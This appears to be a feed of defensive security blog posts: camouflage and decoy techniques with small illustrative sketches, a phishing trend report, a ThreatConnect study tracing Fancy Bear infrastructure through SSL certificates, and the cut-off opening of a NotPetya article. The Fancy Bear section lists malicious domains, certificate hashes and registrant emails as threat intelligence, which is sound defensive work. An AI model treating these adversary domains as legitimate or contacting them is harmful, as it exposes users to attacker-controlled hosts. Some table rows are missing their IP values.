Security teams have adopted a multi-faceted security infrastructure consisting of firewalls, IDS/IPS, content-inspection, and behavioral analytics defense systems. This layered defense strategy provides protection for the majority of detectable threats that are found using a combination of signature-based and non-signature-based detection mechanisms.

An active defense posture builds on this foundation to disrupt threat activities of the adversary; it examines how an adversary may progress through a cyber kill chain and how we can impact the adversary, causing them to pivot to new TTPs or a different target entirely.

Figure 1: Typical actor activities during kill-chain progression

Increasing the time it takes for the adversary to progress through the kill-chain, the expertise required to launch a cyber attack, and ultimately the cost to execute should be additional security objectives.

Many solutions focus solely on one phase of the kill chain such as detecting or blocking C2 communications. But I recommend a broad-based approach to disruptive cyber defense mechanisms that can be applied across all aspects of the kill chain. For example, which phase of the kill chain are we disrupting? Which aspect of progression will have the most impact on the adversary?

Figure 2: Where disruptive techniques can be applied

There are two disruptive approaches to consider adding to your response strategy.

Camouflage: the act, means, or result of obscuring things to deceive an enemy by painting or screening objects so that they are lost to view in the background, or by making up objects that from a distance have the appearance of fortifications.



Deception: to mislead by a false appearance or statement.



Applying both of these techniques to cyber defense strategy can help:

  • Predicting Attacks
    • Ability to gather low-false positive threat intelligence on adversary tactics, indicators…etc.
    • Ability to more easily understand goals, motives, intent
  • Detecting Activities
    • Ability to gather more advanced detection when other protections fail
    • Early alerting and notification to operations without impact to business-critical systems
  • Disrupting & Responding
    • Easily engage with attackers and their TTPs
    • Easy reconnaissance on the attacks
    • Manipulation of behaviors and interactions that confuse, delay, or interrupt attacker’s activities
    • Increase the cost, expertise required, and impact on the attacker

There are at least two areas to apply camouflage and deception activities:

  • Network-Based
    • Interact with TTPs within the network (e.g. routers, firewalls, proxies)
  • Network-Endpoint-Based
    • Interact with TTPs at the endpoint systems (e.g. laptop, mobile, servers)


Network-Based Camouflage: Camouflaging unpatched servers from vulnerability discovery

Many IT & security teams are unable to keep up with the continuous challenge of maintaining software patch levels on all servers (both external and internal). In some cases, there are business process impacts that must be considered before the team maintaining the server pushes an update to the operating system or application stack running on the server. These considerations necessarily slow the velocity of patch updates, and while those decisions are pending, the servers may remain vulnerable to exploitation.

Network-based camouflage is another way to protect against certain types of vulnerabilities. An intermediary network system obfuscates and camouflages the vulnerable service, configured using threat intelligence about the vulnerabilities and the TTPs that may be used to exploit them.

For example, the ROBOT vulnerability is a vulnerability of TLS Cipher settings that can be camouflaged as shown in the diagram below:

Figure 3. ROBOT Vulnerability Camouflage
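As a simpler illustration of the same intermediary-based idea (this sketch hides server version banners rather than TLS cipher behavior, and all header values are hypothetical), the intermediary can strip or genericize anything that fingerprints the software stack behind it:

```python
# Headers that commonly reveal the software stack to a scanner.
REVEALING_HEADERS = {"server", "x-powered-by", "x-aspnet-version"}


def camouflage_response(headers: dict) -> dict:
    """Strip or genericize headers that reveal the software stack,
    denying the scanner the fingerprint it needs for exploit selection."""
    cleaned = {k: v for k, v in headers.items()
               if k.lower() not in REVEALING_HEADERS}
    cleaned["Server"] = "webserver"  # generic banner instead of a version string
    return cleaned


origin = {
    "Server": "Apache/2.2.15 (CentOS)",
    "X-Powered-By": "PHP/5.3.3",
    "Content-Type": "text/html",
}
public = camouflage_response(origin)
```

The vulnerable version still exists behind the intermediary, but vulnerability discovery against it becomes much harder while the patching decision is being worked.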


Network-Endpoint Deception Example: Server Decoys

In addition to camouflaging vulnerabilities on servers and endpoints, security teams can leverage deception techniques. This involves running decoy systems that impersonate legitimate systems in an organization's network, acting as enticements for actors that may be attempting to breach the perimeter or already have done so. The endpoint decoy can provide vital insight into the TTPs employed by those actors. As shown below, the decoys can be provisioned to provide attractive results for an adversary to explore, so that the adversary ultimately spends time considering the false information the decoy provides. This increases the time the adversary is being watched and can yield useful intelligence on their objectives and ultimate goal.

Figure 4. Endpoint System Decoy
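At its simplest, a decoy is a listener that serves a bait banner and records who touched it; a minimal sketch (the OpenSSH banner string is bait, not a real service):

```python
import socket
import socketserver
import threading


class DecoyHandler(socketserver.BaseRequestHandler):
    """Answers any connection with a fake service banner and logs the peer."""
    def handle(self):
        self.server.contacts.append(self.client_address[0])
        self.request.sendall(b"SSH-2.0-OpenSSH_5.3\r\n")  # bait banner


class DecoyServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True

    def __init__(self, address):
        super().__init__(address, DecoyHandler)
        self.contacts = []  # source addresses that touched the decoy


decoy = DecoyServer(("127.0.0.1", 0))  # port 0: bind any free port
threading.Thread(target=decoy.serve_forever, daemon=True).start()
host, port = decoy.server_address

# A scanner probing the decoy receives the bait banner...
with socket.create_connection((host, port), timeout=5) as probe:
    banner = probe.recv(64)

# ...and the defender now has the scanner's address and timing.
decoy.shutdown()
```

No legitimate user has a reason to connect to a decoy, so every contact is a high-signal, low-false-positive alert, which is exactly the intelligence value the paragraph describes.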

There are other defense techniques that can leverage these two capabilities in useful and interesting ways and also extend the camouflage and deception options available to security teams. If you are considering threat responses beyond traditional mitigation steps in your environment I hope you found this background useful. To learn more about LookingGlass’ use of camouflage and deception techniques for threat mitigation, please contact me at @tweet_a_t or @LG_Cyber.


The post Camouflage & Deception: A New Approach to Threat Mitigation appeared first on LookingGlass Cyber Solutions Inc..

Weekly Phishing Report: March 20, 2018


The following data offers a snapshot of the weekly trends in the top industries targeted by phishing attacks from March 11 – 17, 2018.

This week, we saw a 25% decrease in overall phishing activity for the top 20 brands we monitor, with the largest increase in activity coming from Computer Hardware and the largest decrease from Internet Search & Navigation Services. Only three industries saw increases in phishing this week.

The top 3 industries that saw an increase in phishing activity this week:

  1. Computer Hardware (>80%)
  2. Computer Software (>55%)
  3. Electronic Payment Services (>5%)


The top 5 industries that saw a decrease in phishing activity this week: 

  1. Internet Search & Navigation Services (>50%)
  2. Telecommunications (>45%)
  3. Storage & Systems Management Software (>25%)
  4. Banking (>20%)
  5. Social Networking (>10%)


By pulling information from major Internet Service Providers (ISP), partners, clients, feeds, and our own proprietary honey pots and web crawlers, we are able to get a 360-degree view of the phishing landscape. The percentages posted are based on the sum of the phishing threats of the top 20 brands, and do not include anything below the top 20 threshold.
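The week-over-week percentages above are straightforward to compute from raw detection counts; a sketch with purely illustrative numbers (the real counts come from the ISP, partner, honeypot, and crawler sources just described):

```python
def pct_change(previous: int, current: int) -> float:
    """Week-over-week percentage change in phishing detections."""
    return round(100.0 * (current - previous) / previous, 1)


# Hypothetical weekly detection counts per industry (illustrative only).
last_week = {"Computer Hardware": 50, "Banking": 400}
this_week = {"Computer Hardware": 92, "Banking": 310}

changes = {name: pct_change(last_week[name], this_week[name])
           for name in last_week}
```

With these made-up counts, Computer Hardware rises 84% and Banking falls 22.5%, matching the directions (though not the exact figures) reported above.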

The post Weekly Phishing Report: March 20, 2018 appeared first on LookingGlass Cyber Solutions Inc..

A Song of Intel and Fancy

A case study tracking adversary infrastructure through SSL certificate use featuring Fancy Bear/APT28/Sofacy.

A long time ago, in a galaxy... No. Stop. We're not doing that anymore. Instead, we're pivoting to Game of Thrones, or A Song of Ice and Fire for you bookworms, because the fantastical realm provides great material we can relate to cybersecurity.

This research builds off our previous work using SSL certificates and splash pages to proactively identify Fancy Bear infrastructure. We identified an SSL certificate subject string that Fancy Bear has used consistently since 2016, which further illuminates their infrastructure and registration tactics. Our hope is that, in addition to the indicators themselves, our readers will apply these techniques to their research on other adversaries.

We'll walk through the process of how we conducted this research, which used ThreatConnect, Censys, Farsight Security Passive DNS, RiskIQ, and DomainTools. To date, this line of research has identified 47 IPs, 46 domains, 33 registrant email addresses, and 47 SSL certificates shared in ThreatConnect in Incident 20180209C: "C=GB, ST=London, L=London, O=Security, OU=IT" Certificate Infrastructure. It also underscores consistent Fancy Bear tactics including:

  • Use of small or boutique hosting service providers such as Domains4Bitcoins, ITitch, and NJALLA.
  • Minimizing the reuse of email addresses to register domains.
  • Regular use of email domains sapo[.]pt, mail[.]com, centrum[.]cz, and cock[.]li or privacy protection services.
  • Domain registration and SSL certificate creation times that are consistent with an actor operating in Moscow.
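The last point can be checked mechanically: convert each UTC registration or certificate-creation timestamp to Moscow time (UTC+3 year-round since 2014) and see whether it falls within a typical workday. A sketch using a creation time from this research:

```python
from datetime import datetime, timedelta, timezone

MSK = timezone(timedelta(hours=3), "MSK")  # Moscow, UTC+3 year-round


def moscow_business_hours(utc_timestamp: str) -> bool:
    """True if a UTC event time falls within a 9:00-18:00 Moscow workday."""
    utc = datetime.strptime(utc_timestamp, "%Y-%m-%d %H:%M")
    local = utc.replace(tzinfo=timezone.utc).astimezone(MSK)
    return local.weekday() < 5 and 9 <= local.hour < 18


# Certificate created 2016-11-30 07:35 UTC -> 10:35 MSK, a Wednesday morning.
workday = moscow_business_hours("2016-11-30 07:35")
```

One timestamp proves nothing; the pattern matters. Run over dozens of timestamps, a clustering inside Moscow business hours is what supports the consistency assessment above.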

The Watchers in the Night

Everybody thinks they are House Stark material, but we would assert cybersecurity personnel are more like the sworn members of the Night's Watch. You are the watchers on the firewall, the sword in the dark web, and the shield that guards the networks of your organization.

If we're being honest, the ThreatConnect Research team and cyber threat intelligence analysts at large, are most like... wait for it... Samwell Tarly (none of us harbors the delusion of being Jon Snow). Tarly is dedicated to aggregating and analyzing intelligence on threats beyond the wall -- the Night King and his White Walkers -- to better understand how the Night's Watch can react to them and proactively address them.



Looking for Adversary Infrastructure Using a Common SSL Certificate Subject String

In our recent efforts to proactively address Fancy Bear, we reviewed SSL certificate information in Censys for domains and IPs using a "Coming soon" splash page consistent with previously identified Fancy Bear infrastructure. We found the same subject field used repeatedly -- "C=GB, ST=London, L=London, O=Security, OU=IT, CN=(domain name)" -- as shown below for space-delivery[.]com and webversionact[.]org.


Censys SSL certificate information showing consistent use of subject string.


This subject line indicates an SSL certificate likely created using OpenSSL, where the creator assigns values for the country (C), state (ST), location (L), organization (O), organizational unit (OU), and common name (CN). It is important to note that the common name is intended to reflect the domain name where the SSL certificate is being used, but in our research we found several instances where this domain name was misspelled or altogether different from the domain where it was used. More on that later.
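Such a subject string is easy to decompose programmatically, which also makes CN/hosting-domain mismatches easy to flag; a minimal sketch using a certificate CN and hosting domain pair from this research (dots undefanged for parsing):

```python
def parse_subject(subject: str) -> dict:
    """Split an OpenSSL-style subject string into its component fields."""
    return dict(field.strip().split("=", 1) for field in subject.split(","))


subject = "C=GB, ST=London, L=London, O=Security, OU=IT, CN=ecitcom.net"
fields = parse_subject(subject)

# The CN should match the domain actually serving the certificate;
# here the certificate was observed on a different domain entirely.
hosting_domain = "remsupport.org"
mismatch = fields["CN"] != hosting_domain
```

At scale, running this comparison across certificate observations is what surfaces the misspelled or mismatched common names noted above.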


Radiating out: how common is that subject string?

Next, we needed to get an idea of how widely this string is used and what other infrastructure is using similar SSL certificates to gain insight into more possible Fancy Bear infrastructure. Again using Censys, we found 47 certificates that share the same subject string. In Censys, we also queried for IP addresses hosting a server that uses an SSL certificate with that string. The latter provides a view of active infrastructure, while the former can be used to find both historical and active infrastructure.

Censys certificate search results for identified subject string.


Careful though: other individuals could easily use OpenSSL to create certificates with the same subject fields; this alone is not sufficient to identify Fancy Bear. Using ThreatConnect's Analyze function we saw that at least 23 of the specified common names have been associated with Fancy Bear attacks. Many of the remaining domains have also been identified through our ongoing research into name servers that Fancy Bear uses. This increases our confidence in assessing that SSL certificates with that subject string probably are associated with Fancy Bear activity.


ThreatConnect Analyze results showing indicators that already have information in ThreatConnect.
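The confidence logic here amounts to measuring overlap between the certificate common names and previously attributed domains; a sketch with a small subset (the last CN is a hypothetical benign collision, illustrating why overlap with known activity, not the subject string alone, drives the assessment):

```python
# Common names extracted from the identified certificates (subset).
cert_cns = {
    "mvtband[.]net", "acrobatportable[.]com", "space-delivery[.]com",
    "wmdmediacodecs[.]com", "totally-benign[.]com",  # last one hypothetical
}

# Domains previously attributed to Fancy Bear activity (subset).
known_fancy_bear = {
    "mvtband[.]net", "acrobatportable[.]com", "space-delivery[.]com",
    "wmdmediacodecs[.]com",
}

overlap = cert_cns & known_fancy_bear
coverage = len(overlap) / len(cert_cns)  # fraction already attributed
```

A high coverage fraction across independently attributed domains is what justifies assessing the remaining, not-yet-attributed certificates as probably Fancy Bear.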


Stitching together certificates, IP addresses, and the right domains

Censys SSL certificate information for 46ce0b05f302e0d855e9cc751100299345466581.


At least 39 of the certificates identified in the previous query are no longer in use, so we used RiskIQ to search for the SHA-1 hash and identify the IP addresses that previously hosted a server using that certificate. For example, searching for the previously used SSL certificate 46ce0b05f302e0d855e9cc751100299345466581, we saw that it was used at the IP


RiskIQ SSL certificate information for 46ce0b05f302e0d855e9cc751100299345466581.


Reviewing this IP address in ThreatConnect using our integration with Farsight DNSDB, we saw that this IP address hosted the domain remsupport[.]org. This is a notable finding as well because the domain does not correspond to the ecitcom[.]net that was specified in the common name field in the certificate subject, so we took an extra step to make sure we matched up the right certificate to the right domain.


ThreatConnect's Farsight Security Passive DNS integration results for
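The pivot chains two lookups: certificate hash to hosting IP (from RiskIQ), then IP to domains (from Farsight passive DNS). A sketch with a hypothetical TEST-NET placeholder IP standing in for the real value:

```python
# SHA-1 -> IP the certificate was observed on. The IP here is a
# hypothetical TEST-NET placeholder; RiskIQ supplies the real value.
cert_to_ip = {
    "46ce0b05f302e0d855e9cc751100299345466581": "192.0.2.10",
}

# IP -> domains seen hosted there; passive DNS supplies these.
ip_to_domains = {
    "192.0.2.10": ["remsupport[.]org"],
}


def domains_for_cert(sha1: str) -> list:
    """Pivot from a certificate hash to the domains hosted at its IP."""
    ip = cert_to_ip.get(sha1)
    return ip_to_domains.get(ip, [])


hosted = domains_for_cert("46ce0b05f302e0d855e9cc751100299345466581")
```

Because the CN in a certificate subject may not match the domain actually using it, this IP-based join is the safer way to pair certificates with the right domains.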


Conducting this same process for all of the SSL certificates, we came up with the following list sorted by the SSL certificate's create date/time:

SSL Certificate SHA-1 IP Hosting Certificate SSL Certificate Create Date/Time Domain Hosted At IP or Common Name in SSL Certificate
62e1045ae816b5f44cb43ab52ecb8e4534b63147 2/20/18 12:19 webversionact[.]org
1e185ee8ac3c3eafcc2b4d842ed5711b9c62a305 2/8/18 7:57 mdcrewonline[.]com
43df735cfea482ffc27252ae08c94f359c499f69 1/31/18 11:52 cdnverify[.]net
9d73605a130c377909fe463bc68ac83f73c04a46 1/23/18 11:28 nomartung[.]org
fcc696070de34157a02c46aa765c3c7969677fea 12/21/17 15:55 europehistoricalmuseum[.]com
126e9d0cf80badf7810859fc116267d40ed1c58b 12/21/17 8:34 supservermgr[.]com
9153efa5001c67fdce4bb861f8758cd90b072901 10/30/17 13:44 satellitedeluxpanorama[.]com
739e8cc0519aeeb8dd1417e45f9577bd394684f0 10/30/17 10:41 webviewres[.]net

10/30/17 9:43 vermasterss[.]com
89bba1abb0078ffab8dbf2cfa85697b147d8223d 10/27/17 7:46 funnymems[.]com
3f17cbb5792e6b9ff8607b23bbc8ad40c735819c 10/20/17 10:21 space-delivery[.]com
6860d7aabef2f2382476d9a350c225956bf351c7 10/17/17 8:51 travelbern[.]com
b86f517d347e53b3b7116682d7f36a3b77fa8bdf 10/16/17 8:41 space-delivery[.]com
46330eac674b27a4f34ba6864a74bfef59998e5c 10/4/17 11:46 myinvestgroup[.]com
551a8e0b504fa19e643dae39002bd0b91a5cfa7e 10/2/17 14:29 nanetsdeb[.]com
2a71f7ed0de7b89f4a10d329227898edcd3af6ce 9/29/17 13:52 nanetsdeb[.]com
b99346a7f7809578330e4763329209c2381d2f95 9/29/17 11:48 fastphotobucket[.]com
ea3198f2ef8685a6f8a1303a55fdb7062a6f30b0 7/12/17 13:05 rapidfileuploader[.]org
b64268d418592d481e13ed6aa4dc233b9dbd486d 7/7/17 7:39 viters[.]org
9aa7508f1be201120511b1a4bc91e653c82df924 6/28/17 12:57 mvtband[.]net
d514a2a79a0e1a046846963797319fe8e00cdbeb 4/13/17 7:43 spelns[.]com
2e53a96a63c8cc17f2824bcdf7c93d64dad45170 4/3/17 13:14 wmdmediacodecs[.]com
b07d766664cfa183dba3ee32ab35ed32c7f501c2 3/29/17 10:09 acrobatportable[.]com
f9abac0f831e9ea43727a02810ebd6969e8e5951 2/3/17 9:06 lgemon[.]org
37ab57a30ffd3826a24acd2b3b596d7bf160960c 1/31/17 8:41 lowprt[.]org
1f2a652a68f9ae6a241aed55d80597222d6c2b21 1/13/17 9:16 evbrax[.]org
bd4255444ba646796c16e967ec0aa1dd95a7a0f2 1/13/17 7:22 wsusconnect[.]com
09ab2ae3ff9f175c18786656194a81be5d6ff732 12/21/16 9:35 gtranm[.]com
010e271b2c860caba78475f02edcd30d7a896383 12/15/16 9:57 reportscanprotecting[.]org
513587ce94be7d70b1f6661f22758ec6fd591d11 11/30/16 8:03 runvercheck[.]com
8dc11f57d69a5583b196c28a9cf816e10a3fa327 11/30/16 7:47 noticermk[.]com
46ce0b05f302e0d855e9cc751100299345466581 11/30/16 7:35 remsupport[.]org
edb4339cdfa0b43d8ef5fb49cc9fdcbbbf2208be 11/25/16 7:30 globaltechresearch[.]org
0153d822178cd0f0725a9a1438d5b2a49edfe71a 11/17/16 6:09
d1a1d61806513cde9b2f8d817a55cc16384f490f 11/11/16 9:35 applecloudupdate[.]com
9d54194ba9140c148b8b3eb900dfb7b11ec155e2 11/10/16 8:00 joshel[.]com
9baf76a0a3a4ce78d3c2ce04e64cae0ea604c7aa 10/31/16 9:20 akamaisoftupdate[.]com
7dcf45941d734b4c42c9a1f90d57e1c816610dff 10/26/16 7:57 ppcodecs[.]com

10/24/16 8:22 appservicegroup[.]com
c201e616fe90ae2592c34de03611748510aba143 9/13/16 5:33 dateosx[.]com
f6ac5bd6aa52d96d8d413157fbfd1a6be7f65cb7 9/9/16 13:27 dowssys[.]com
5be56e0660a001a12c8ef250ff86369c50ca73a8 8/18/16 12:32 microsoftstoreservice[.]com
ea8e4e7882a116ed43db4e5218efb2fd3ba2d116 7/20/16 6:56 microsoftdccenter[.]com
c3b7df9d2a4eb05d399c336eec4c6ff0688596bd 7/12/16 6:12 mvsband[.]com
c5ec8bb4bb5842930da935e13b9bee604e3b6182 7/8/16 7:54 dvsservice[.]com
f65d9f8f385cf384cee24a6d04df600d575dd5f6 7/8/16 7:09 akamaitechupdate[.]com
7d5eaecc2c6865a1f846d03b6d3e0b649a36c2c1 6/1/16 7:35


Once we had a list of the domains, we further enriched this information by identifying the WHOIS information for these domains. Doing so provided historical information on how these domains were registered.



Gathering Intelligence: Layering on WHOIS Data

To do so, we used some capabilities and integrations from our friends at DomainTools. Specifically, we were looking to identify registrant email addresses, name servers/hosting providers, and creation timestamps. We started by doing a DomainTools Iris search for the domains listed above.

DomainTools Iris search for identified domains.


This provided the current WHOIS information for those domains. However, some of the domains have been taken over since they were operational or the WHOIS has otherwise changed since it was registered for use in operations. For any domains where we thought this was the case, we reviewed the WHOIS history in our DomainTools Spaces app to identify the original registration information that corresponds to the timeframe in which the domain was operational.

ThreatConnect's DomainTools Spaces App WHOIS history for adobeupdatetechnology[.]com.


Ultimately, we identified the below registration information for these domains.


Domain Original Registrant Original Nameserver Create Date Create Time
webversionact[.]org Private registration NS-CANADA.TOPDNS.COM 2/14/18 7:44:16
cdnverify[.]net declan.jefferson@sapo[.]pt 1/31/18 7:58:54
nomartung[.]org Private registration NS-CANADA.TOPDNS.COM 1/17/18 3:10:21
mdcrewonline[.]com htomary@cock[.]li 12/21/17 13:19:00
supservermgr[.]com Private registration NS-CANADA.TOPDNS.COM 12/21/17 7:58:00
europehistoricalmuseum[.]com Private registration 10/26/17 2:22:36
vermasterss[.]com reynoso89@cock[.]li 10/25/17 8:24:14
webviewres[.]net Private registration 10/25/17 8:23:14
funnymems[.]com Private registration 10/24/17 11:11:37
satellitedeluxpanorama[.]com Private registration 10/20/17 11:25:22
space-delivery[.]com elbertnagel@cock[.]li 10/9/17 9:22:13
nanetsdeb[.]com gabrielromao@sapo[.]pt 9/29/17 5:53:25
fastphotobucket[.]com Private registration 9/28/17 14:13:26
myinvestgroup[.]com loisoji@firemail[.]cc 9/28/17 9:27:23
travelbern[.]com k0koth@sapo[.]pt 9/12/17 11:00:44
rapidfileuploader[.]org Private registration NS-CANADA.TOPDNS.COM 7/11/17 13:27:47
viters[.]org Private registration 7/6/17 13:08:10
mvtband[.]net Private registration 6/27/17 8:57:22
wmdmediacodecs[.]com istakav@cock[.]li 3/31/17 12:18:37
spelns[.]com Private registration 3/22/17 18:28:42
lgemon[.]org ezgune@cock[.]li STVL113289.MERCURY.OBOX-DNS.COM 1/31/17 11:43:39
lowprt[.]org avramberkovic@centrum[.]cz NS4.ITITCH.COM 1/20/17 12:48:37
acrobatportable[.]com jul_marian@centrum[.]cz 1/12/17 9:23:47
evbrax[.]org kern82@gmx[.]net 1/10/17 8:48:43
gtranm[.]com wee7_nim@centrum[.]cz 12/14/16 8:54:26
reportscanprotecting[.]org abor.g.s@europe[.]com 12/3/16 9:43:29
runvercheck[.]com cauel-mino@centrum[.]cz 11/25/16 12:11:35
remsupport[.]org ja.philip@centrum[.]cz 11/25/16 11:08:16
noticermk[.]com frfdccr42@centrum[.]cz 11/24/16 12:45:47
globaltechresearch[.]org morata_al@mail[.]com 11/21/16 11:23:40
joshel[.]com germsuz86@centrum[.]cz 11/9/16 14:18:09
applecloudupdate[.]com ll1kllan@engineer[.]com 11/4/16 1:09:13
akamaisoftupdate[.]com mahuudd@centrum[.]cz 10/27/16 13:23:20
wsusconnect[.]com laurent1983@mail[.]com 10/27/16 11:22:42
apptaskserver[.]com partanencomp@mail[.]com 10/22/16 11:26:00
appservicegroup[.]com olivier_servgr@mail[.]com 10/19/16 8:27:30
ppcodecs[.]com chpiost8n@post[.]com 10/19/16 7:36:39
dateosx[.]com milimil0702@mail[.]com 9/13/16 10:12:31
dowssys[.]com adam_corbett@mail[.]com 9/8/16 12:38:29
mvsband[.]com iflatley@openmailbox[.]org 8/24/16 13:38:02
microsoftstoreservice[.]com craft030795@mail[.]com 8/19/16 8:47:21
microsoftdccenter[.]com Private registration 7/20/16 12:51:42
dvsservice[.]net pirlo.vasces@mail[.]com 7/11/16 9:48:23
dvsservice[.]com fernando2011@post[.]com 7/5/16 14:55:25
akamaitechupdate[.]com guiromolly@mail[.]com 6/21/16 7:49:25
adobeupdatetechnology[.]com best.cameron@mail[.]com 5/30/16 14:24:25


We have shared this information, including the domains, IPs, and email addresses, with our Common Community in Incident 20180209C: "C=GB, ST=London, L=London, O=Security, OU=IT" Certificate Infrastructure.


Assessing Tactics

In addition to monitoring for new domains and IPs that use the aforementioned SSL certificate subject string, we can glean several Fancy Bear tactics and proactively exploit them to identify the group's activity going forward.

Hosting Service Providers/Name Servers
The domains' original name servers help identify the hosting service providers that the actors used to procure the infrastructure. These include several providers that we've previously called out, such as Domains4Bitcoins, ITitch, Nemohosts, Carbon2u, and NJALLA. We can proactively monitor for newly registered domains that use these name servers and share other consistencies with Fancy Bear to potentially identify their infrastructure before it is used in operations.
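As a rough illustration of that monitoring, the sketch below filters a feed of new registrations against name-server suffixes drawn from the registration table above. The feed, the domains in it, and the exact suffix list are fabricated for the example; a real implementation would consume a zone-file or new-registration feed.

```python
# Name-server suffixes seen in the registration data above.
WATCHED_NAMESERVER_SUFFIXES = (
    ".TOPDNS.COM",
    ".ITITCH.COM",
    ".OBOX-DNS.COM",
)

def flag_suspect_registrations(feed):
    """Return newly registered domains whose name server matches a watched provider."""
    return [domain for domain, ns in feed
            if ns.upper().endswith(WATCHED_NAMESERVER_SUFFIXES)]

# Hypothetical feed of (domain, name server) pairs.
feed = [
    ("example-update[.]com", "NS-CANADA.TOPDNS.COM"),
    ("benign-site[.]org", "NS1.SOMEREGISTRAR.COM"),
    ("lowprt-like[.]org", "NS4.ITITCH.COM"),
]
print(flag_suspect_registrations(feed))
```

A name-server match alone is weak evidence - these providers also serve legitimate customers - so flagged domains would still need the other consistencies described here before being treated as suspect.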

Email Addresses

We used DomainTools Reverse WHOIS to search for any additional domains registered using the email addresses above. As it turns out, only one of the email addresses -- iflatley@openmailbox[.]org -- registered a second domain (rndversion[.]net). This minimal reuse of email addresses suggests an operational security (opsec) effort to deter efforts to trace out their infrastructure based on known registrants.

DomainTools Reverse WHOIS results for iflatley@openmailbox[.]org.


While some of the domains were registered using privacy protection services, for those that weren't we see the consistent use of sapo[.]pt, cock[.]li, centrum[.]cz, and mail[.]com. For email domains that are less common, like cock[.]li, we can create a Track in ThreatConnect that will alert us to any new domains registered using that email domain.


Creating a Track in ThreatConnect.
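Outside of ThreatConnect, the same alerting logic can be approximated in a few lines. The watched set below mirrors the less common email providers noted above (mail[.]com is likely too widely used to track this way); the function name and sample addresses are illustrative.

```python
import re

# Uncommon registrant email domains observed in the registrations above.
WATCHED_EMAIL_DOMAINS = {"cock.li", "sapo.pt", "centrum.cz", "firemail.cc"}

def registrant_matches_track(registrant_email: str) -> bool:
    """True if a new registration's contact email uses a watched email domain."""
    match = re.search(r"@([\w.-]+)$", registrant_email.strip().lower())
    return bool(match) and match.group(1) in WATCHED_EMAIL_DOMAINS

print(registrant_matches_track("htomary@cock.li"))    # True
print(registrant_matches_track("someone@gmail.com"))  # False
```

Run against a daily feed of new WHOIS records, a match would generate an alert for analyst review rather than an automatic verdict.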

Opsec Mistakes

When reviewing the SSL certificates, we identified several possible opsec mistakes that would either arouse suspicion or allow defenders to trace out some of the actors' infrastructure. As we mentioned earlier, the common name field in an SSL certificate is intended to correspond to the domain name where the certificate is used; however, for ten of the identified certificates, that wasn't the case. In some, the domain name was misspelled, as in the below certificate for cdnverify[.]net. This mistake would be a red flag for defenders looking to verify the legitimacy of encountered domains based on their SSL certificates.

Censys SSL certificate information for 43df735cfea482ffc27252ae08c94f359c499f69.


In other certificates, a completely different common name was used, as was the case for the aforementioned ecitcom[.]net. It turns out that ecitcom[.]net was the specified common name for five of the certificates listed above. When we search Censys for other certificates using that common name, we find four more certificates that were created from February 2016 to September 2016. This helps us identify additional infrastructure, including 51.254.158[.]57 and dowstem[.]com. Researchers can exploit mistakes like these to expand their understanding of adversary infrastructure.


Creation Timestamps

Finally, we can make use of the creation timestamps for the identified certificates and domains. As the chart below shows, a large majority of the certificates and domains were registered between 0600 and 1400 GMT. This is consistent with a 0900 to 1700 standard work day in Moscow. While not definitive -- other countries in the Middle East, Eastern Europe, and Western Africa are in the same timezone -- in conjunction with the previous associations to Fancy Bear this finding increases our confidence in the attribution to Fancy Bear.


Chart showing the number of domains and SSL certificates that were created by hour relative to Moscow's time zone (MSK).
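To reproduce that analysis, each creation timestamp (assumed here to be UTC/GMT, matching the table above) can be shifted to Moscow time and binned by hour. A minimal sketch using a handful of timestamps from the table:

```python
from collections import Counter
from datetime import datetime, timedelta, timezone

MSK = timezone(timedelta(hours=3))  # Moscow has used UTC+3 year-round since 2014

# A few creation timestamps from the table above, assumed to be UTC/GMT.
created_utc = [
    datetime(2017, 6, 27, 8, 57, 22, tzinfo=timezone.utc),   # mvtband[.]net
    datetime(2017, 10, 20, 11, 25, 22, tzinfo=timezone.utc), # satellitedeluxpanorama[.]com
    datetime(2017, 1, 20, 12, 48, 37, tzinfo=timezone.utc),  # lowprt[.]org
    datetime(2018, 1, 31, 7, 58, 54, tzinfo=timezone.utc),   # cdnverify[.]net
]

hours_msk = Counter(ts.astimezone(MSK).hour for ts in created_utc)
workday = sum(count for hour, count in hours_msk.items() if 9 <= hour < 17)
print(f"{workday} of {len(created_utc)} creations fall within a 09:00-17:00 MSK workday")
```

Over a data set this small the result means little; the pattern only becomes meaningful across the full set of domains and certificates, as in the chart.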


The registration and certificate creation times are of limited use for proactively identifying additional Fancy Bear domains - especially from a single indicator - but the consistency of the data set over time has value for defenders and researchers.


Conclusion: To the Citadel!

We are sometimes asked why we share out these findings publicly, the argument being that we are revealing research methodologies that Fancy Bear can now incorporate into their opsec and avoid in future operations. That's a fair concern, but in response we argue that by publicizing these findings and methodologies, we are hoping to show our readers ways to research not only Fancy Bear, but the other Night Kings that keep them up at night.


Additionally, as we've stated before, in publicly outing or sharing these indicators and tactics, organizations can ultimately increase the actors' costs and push them to spend more time and resources on procuring infrastructure. The more this is done, the better. Eventually, you might get to the point where you become a factor in the actor's decision making or cost benefit analysis.

Samwell Tarly's main source of intelligence, Castle Black's library, ultimately proves to be insufficient for determining how to best the Night King. He then travels to the Citadel, a huge library of intelligence consolidated from a variety of sources, in hopes of garnering knowledge that will help defend the realm. For threat intelligence researchers and cybersecurity personnel, ThreatConnect acts as a metaphorical Citadel, consolidating, aggregating, and analyzing intelligence from a range of internal and external sources. However, whereas the maesters at the Citadel seem unencumbered by what happens outside of Oldtown, ThreatConnect gives users the ability to actually act on the intelligence they receive and integrate with the defensive tools they have in place to mitigate their threats. If you want to learn more, check out our platform.


ThreatConnect Dashboard showing users recent intelligence from our Citadel on Fancy Bear.

The post A Song of Intel and Fancy appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

NotPetya’s Challenge? Re-Prioritize Your Information Security

The damaging wiper attack last June carried a clear message for global organizations: you need to re-prioritize your security spending.

About a month after the NotPetya malware outbreak in late June 2017, I was on the phone with someone I’ll call “Stacy,” who worked for a freight forwarding firm in the U.S. At the time we spoke, Stacy was desperate to locate a very important piece of equipment known as a “blowout preventer” (or BOP) that her company had contracted to ship to a customer in Norway for use on one of the offshore oil platforms there. The BOP had gone missing, which is surprising if you’ve ever seen one: they’re massive pieces of equipment that get trucked around on 40-foot flatbed trucks.

Stacy knew where her shipment was: sitting on the dock in Bremerhaven, Germany, where it had landed right around the time NotPetya began spreading on June 27th. The problem was that her shipping company, A.P. Møller-Maersk, didn’t. Instead, it was scrambling to respond to the attack.

